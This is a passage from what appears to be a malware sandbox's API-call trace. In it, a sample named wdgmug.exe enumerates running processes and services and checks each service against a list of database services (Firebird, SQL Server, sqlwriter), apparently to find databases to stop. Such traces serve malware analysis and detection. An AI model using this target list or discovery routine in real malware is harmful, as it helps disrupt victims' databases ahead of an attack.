th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.524] lstrlenW (lpString="lsass.exe") returned 9 [0285.524] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0285.525] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0285.525] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0285.525] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0285.525] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.526] lstrlenW (lpString="svchost.exe") returned 11 [0285.526] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.527] lstrlenW (lpString="svchost.exe") returned 11 [0285.527] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.527] lstrlenW (lpString="dwm.exe") returned 7 [0285.527] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.528] lstrlenW (lpString="svchost.exe") returned 11 [0285.528] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.528] lstrlenW (lpString="svchost.exe") returned 11 [0285.528] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.529] lstrlenW (lpString="svchost.exe") returned 11 [0285.529] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.529] lstrlenW (lpString="svchost.exe") returned 11 [0285.529] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.530] lstrlenW (lpString="svchost.exe") returned 11 [0285.530] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.530] lstrlenW (lpString="svchost.exe") returned 11 [0285.530] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.531] lstrlenW (lpString="svchost.exe") returned 11 [0285.531] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.532] lstrlenW (lpString="svchost.exe") returned 11 [0285.532] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.532] lstrlenW (lpString="svchost.exe") returned 11 [0285.532] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.533] lstrlenW (lpString="svchost.exe") returned 11 [0285.533] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.533] lstrlenW (lpString="spoolsv.exe") returned 11 [0285.533] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.534] lstrlenW (lpString="svchost.exe") returned 11 [0285.534] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.535] lstrlenW (lpString="audiodg.exe") returned 11 [0285.535] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0285.535] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0285.535] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0285.536] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0285.536] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0285.536] lstrlenW (lpString="Memory Compression") returned 18 [0285.536] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0285.704] lstrlenW (lpString="taskhostw.exe") returned 13 [0285.704] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0285.772] lstrlenW (lpString="sihost.exe") returned 10 [0285.772] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.776] lstrlenW (lpString="svchost.exe") returned 11 [0285.776] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0285.776] lstrlenW (lpString="MDMAgent.exe") returned 12 [0285.777] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0285.777] lstrlenW (lpString="taskhostw.exe") returned 13 [0285.777] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.778] lstrlenW (lpString="explorer.exe") returned 12 [0285.779] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0285.779] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0285.779] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0285.780] lstrlenW (lpString="SearchUI.exe") returned 12 [0285.780] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0285.781] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0285.781] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.781] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0285.781] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0285.782] lstrlenW (lpString="mobsync.exe") returned 11 [0285.782] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0285.782] lstrlenW (lpString="wdgmug.exe") returned 10 [0285.782] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0285.783] lstrlenW (lpString="cmd.exe") returned 7 [0285.783] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0285.784] lstrlenW (lpString="conhost.exe") returned 11 [0285.784] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0285.784] CloseHandle (hObject=0x37c) returned 1 [0285.784] Sleep (dwMilliseconds=0x1f4) [0286.353] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013db8 [0286.353] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0286.354] GetLastError () returned 0xea [0286.354] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x560fa8 [0286.354] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x560fa8, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x560fa8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0286.355] CloseServiceHandle (hSCObject=0x4013db8) returned 1 [0286.355] lstrlenW (lpString="AppXSvc") returned 7 [0286.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0286.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0286.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0286.356] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0286.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0286.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0286.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0286.356] lstrlenW (lpString="Audiosrv") returned 8 [0286.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0286.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0286.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0286.356] lstrlenW (lpString="BFE") returned 3 [0286.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0286.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0286.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0286.356] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0286.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0286.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0286.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0286.356] lstrlenW (lpString="CDPSvc") returned 6 [0286.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0286.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0286.356] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0286.356] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0286.357] lstrlenW (lpString="ClickToRunSvc") returned 13 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0286.357] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0286.357] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0286.357] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0286.357] lstrlenW (lpString="CryptSvc") returned 8 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0286.357] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0286.357] lstrlenW (lpString="DcomLaunch") returned 10 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0286.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0286.357] lstrlenW (lpString="DeviceAssociationService") returned 24 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0286.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0286.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0286.357] lstrlenW (lpString="Dhcp") returned 4 [0286.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0286.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0286.357] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0286.358] lstrlenW (lpString="Dnscache") returned 8 [0286.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0286.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0286.358] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0286.358] lstrlenW (lpString="DPS") returned 3 [0286.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0286.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0286.358] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0286.358] lstrlenW (lpString="DusmSvc") returned 7 [0286.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0286.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0286.358] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0286.358] lstrlenW (lpString="EventLog") returned 8 [0286.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0286.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0286.358] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0286.358] lstrlenW (lpString="EventSystem") returned 11 [0286.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0286.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0286.358] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0286.358] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0286.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0286.358] lstrlenW (lpString="FontCache") returned 9 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0286.359] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0286.359] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0286.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0286.359] lstrlenW (lpString="gpsvc") returned 5 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0286.359] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0286.359] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0286.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0286.359] lstrlenW (lpString="iphlpsvc") returned 8 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0286.359] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0286.359] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0286.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0286.359] lstrlenW (lpString="KeyIso") returned 6 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0286.359] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0286.359] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0286.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0286.359] lstrlenW (lpString="LanmanServer") returned 12 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0286.359] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0286.359] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0286.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0286.359] lstrlenW (lpString="LanmanWorkstation") returned 17 [0286.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0286.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0286.360] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0286.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0286.360] lstrlenW (lpString="lfsvc") returned 5 [0286.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0286.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0286.360] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0286.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0286.360] lstrlenW (lpString="lmhosts") returned 7 [0286.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0286.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0286.360] lstrcmpiW 